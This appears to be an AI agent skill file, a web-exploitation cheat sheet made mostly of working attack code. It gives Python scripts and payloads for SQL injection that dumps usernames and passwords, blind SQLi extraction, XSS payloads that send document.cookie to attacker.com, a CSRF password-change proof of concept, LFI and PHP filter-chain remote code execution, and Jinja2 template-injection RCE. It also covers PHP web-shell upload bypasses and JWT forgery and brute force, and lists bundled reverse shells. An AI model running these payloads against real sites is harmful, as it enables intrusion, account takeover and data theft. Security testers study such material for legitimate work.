Web Exploitation Patterns

When to Use

Load this skill when:

Testing web applications for vulnerabilities
Exploiting SQL injection, XSS, or CSRF
Bypassing file upload restrictions
Testing for LFI/RFI (Local/Remote File Inclusion)
Exploiting SSTI (Server-Side Template Injection)
Manipulating JWT tokens
Analyzing web traffic with Burp Suite

SQL Injection

Detection and Exploitation

python

import requests

# Test for SQL injection
payloads = [
    "'",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1' /*",
    "admin' --",
    "admin' #",
    "' UNION SELECT NULL--",
]

for payload in payloads:
    response = requests.post(url, data={'username': payload, 'password': 'test'})
    if "error" in response.text or "mysql" in response.text.lower():
        print(f"[!] Vulnerable to: {payload}")

Union-Based SQLi

python

# Step 1: Find number of columns
for i in range(1, 20):
    payload = f"' UNION SELECT {','.join(['NULL']*i)}--"
    response = requests.get(f"{url}?id={payload}")
    if "error" not in response.text:
        print(f"[+] Number of columns: {i}")
        break

# Step 2: Extract data
payloads = [
    "' UNION SELECT 1,version(),3--",
    "' UNION SELECT 1,database(),3--",
    "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--",
    "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--",
]

Blind SQLi

python

# Time-based blind SQLi
import time

def time_based_sqli(url, param):
    """Check if parameter is vulnerable to time-based SQLi"""
    payload = f"' AND SLEEP(5)--"
    start = time.time()
    response = requests.get(f"{url}?{param}={payload}")
    elapsed = time.time() - start
    
    if elapsed >= 5:
        print(f"[+] Time-based SQLi confirmed on {param}")
        return True
    return False

# Boolean-based blind SQLi
def boolean_based_sqli(url):
    """Extract data character by character"""
    result = ""
    for i in range(1, 100):  # Max 100 characters
        for c in range(32, 127):  # ASCII printable
            payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--"
            response = requests.get(f"{url}?id={payload}")
            if "Welcome" in response.text:  # Success indicator
                result += chr(c)
                print(f"[+] Found: {result}")
                break
        else:
            break
    return result

Cross-Site Scripting (XSS)

Reflected XSS

javascript

// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

// Bypass filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert(1)>

// Extract cookies
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">

Stored XSS

python

import requests

# Test stored XSS
xss_payloads = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '"><script>alert(1)</script>',
    "';alert(1);//",
]

for payload in xss_payloads:
    # Submit payload
    requests.post(url + "/comment", data={'text': payload})
    
    # Check if executed
    response = requests.get(url + "/comments")
    if payload in response.text:
        print(f"[+] Stored XSS: {payload}")

CSRF (Cross-Site Request Forgery)

html

<!-- CSRF PoC for form submission -->
<html>
  <body>
    <form action="https://target.com/change_password" method="POST">
      <input type="hidden" name="new_password" value="hacked123" />
      <input type="hidden" name="confirm_password" value="hacked123" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

python

# Test CSRF protection
import requests

session = requests.Session()

# Login first
session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})

# Try action without token
response = session.post(url + "/delete_user", data={'id': '1'})

if response.status_code == 200:
    print("[!] No CSRF protection!")

Local File Inclusion (LFI)

Path Traversal

python

# Common LFI payloads
lfi_payloads = [
    "../../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "....\/....\/....\/....\/etc\/passwd",
    "/etc/passwd",
    "php://filter/convert.base64-encode/resource=index.php",
    "expect://whoami",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7",
]

for payload in lfi_payloads:
    response = requests.get(f"{url}?page={payload}")
    if "root:" in response.text or "<?php" in response.text:
        print(f"[+] LFI found: {payload}")

PHP Filter Chain (RCE)

python

# Use php://filter to achieve RCE
filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|"
filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"
# ... (full chain truncated for brevity)
filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"

response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")

Server-Side Template Injection (SSTI)

Detection

python

# Test payloads for common template engines
ssti_tests = {
    'Jinja2': "{{7*7}}",  # Python (Flask)
    'Twig': "{{7*7}}",    # PHP
    'ERB': "<%= 7*7 %>",  # Ruby
    'Smarty': "{7*7}",    # PHP
    'Velocity': "#set($x=7*7)$x",  # Java
}

for engine, payload in ssti_tests.items():
    response = requests.get(f"{url}?name={payload}")
    if "49" in response.text:
        print(f"[+] {engine} SSTI detected!")

Jinja2 Exploitation

python

# Read file
payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}"

# RCE (Python 2)
payload = "{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.sh', 'w').write('#!/bin/bash\\nid') }}"

# RCE (Python 3)
payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"

File Upload Bypass

Extension Bypass

python

# Test various extensions
extensions = [
    'php', 'php3', 'php4', 'php5', 'phtml', 'pht',
    'php.jpg', 'php.png', 'php;.jpg',
    'php%00.jpg',  # Null byte injection
]

for ext in extensions:
    filename = f"shell.{ext}"
    files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')}
    response = requests.post(url + "/upload", files=files)
    
    if response.status_code == 200:
        print(f"[+] Uploaded: {filename}")

Content-Type Bypass

python

# Try different MIME types
content_types = [
    'image/jpeg',
    'image/png',
    'image/gif',
    'application/octet-stream',
]

for ctype in content_types:
    files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)}
    response = requests.post(url + "/upload", files=files)

Magic Bytes Bypass

python

# Add GIF header to bypass file type checks
content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>"
files = {'file': ('shell.php', content, 'image/gif')}
response = requests.post(url + "/upload", files=files)

JWT Token Manipulation

python

import jwt
import base64

# Decode JWT
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)

# None algorithm attack
header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=')
payload = base64.b64encode(b'{"user":"admin"}').strip(b'=')
forged_token = header + b'.' + payload + b'.'

# Weak secret bruteforce
import hashlib
with open('wordlists/common.txt') as f:
    for secret in f:
        secret = secret.strip()
        try:
            jwt.decode(token, secret, algorithms=['HS256'])
            print(f"[+] Found secret: {secret}")
            break
        except:
            continue

Quick Reference

Vulnerability	Detection Pattern	Exploitation
SQL Injection	`'` , `' OR 1=1--`	`' UNION SELECT ...`
XSS	`<script>alert(1)</script>`	Cookie stealing, session hijacking
LFI	`../../../etc/passwd`	Read sensitive files, RCE via log poisoning
SSTI	`{{77}}` , `${77}`	RCE via template engine
File Upload	Upload `.php` , `.phtml`	Web shell execution
CSRF	No token validation	Force user actions
JWT	`alg: none` , weak secret	Privilege escalation

Bundled Resources

Scripts

```
scripts/csrf_grabber.py
```
- Extract CSRF tokens automatically
```
scripts/jwt_tamper.py
```
- JWT token manipulation tool
```
scripts/lfi_tester.py
```
- Automated LFI testing
```
scripts/ssti_tester.py
```
- SSTI detection and exploitation
```
scripts/upload_tester.py
```
- File upload bypass testing

Payloads

```
payloads/sqli_basic.txt
```
- Basic SQL injection payloads
```
payloads/sqli_mysql.txt
```
- MySQL-specific payloads
```
payloads/xss_reflected.txt
```
- XSS test vectors
```
payloads/ssti_jinja2.txt
```
- Jinja2 SSTI payloads
```
payloads/cmd_injection.txt
```
- Command injection patterns
```
payloads/lfi.txt
```
- LFI/path traversal payloads
```
payloads/ssrf.txt
```
- SSRF test URLs
```
payloads/file_upload_bypass.txt
```
- Extension bypass techniques

Webshells

```
webshells/php_reverse.php
```
- PHP reverse shell
```
webshells/aspx_cmd.aspx
```
- ASPX command shell
```
webshells/jsp_cmd.jsp
```
- JSP command shell
```
webshells/node_cmd.js
```
- Node.js shell

Templates

```
templates/web_requests.py
```
- Python requests template with session handling

Wordlists

```
wordlists/
```
- Common username/password lists (from SecLists)

Keywords

web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup

web-exploits

NPX Install

Tags

SKILL.md Content

Web Exploitation Patterns

When to Use

SQL Injection

Detection and Exploitation

Union-Based SQLi

Blind SQLi

Cross-Site Scripting (XSS)

Reflected XSS

Stored XSS

CSRF (Cross-Site Request Forgery)

Local File Inclusion (LFI)

Path Traversal

PHP Filter Chain (RCE)

Server-Side Template Injection (SSTI)

Detection

Jinja2 Exploitation

File Upload Bypass

Extension Bypass

Content-Type Bypass

Magic Bytes Bypass

JWT Token Manipulation

Quick Reference

Bundled Resources

Scripts

Payloads

Webshells

Templates

Wordlists

Keywords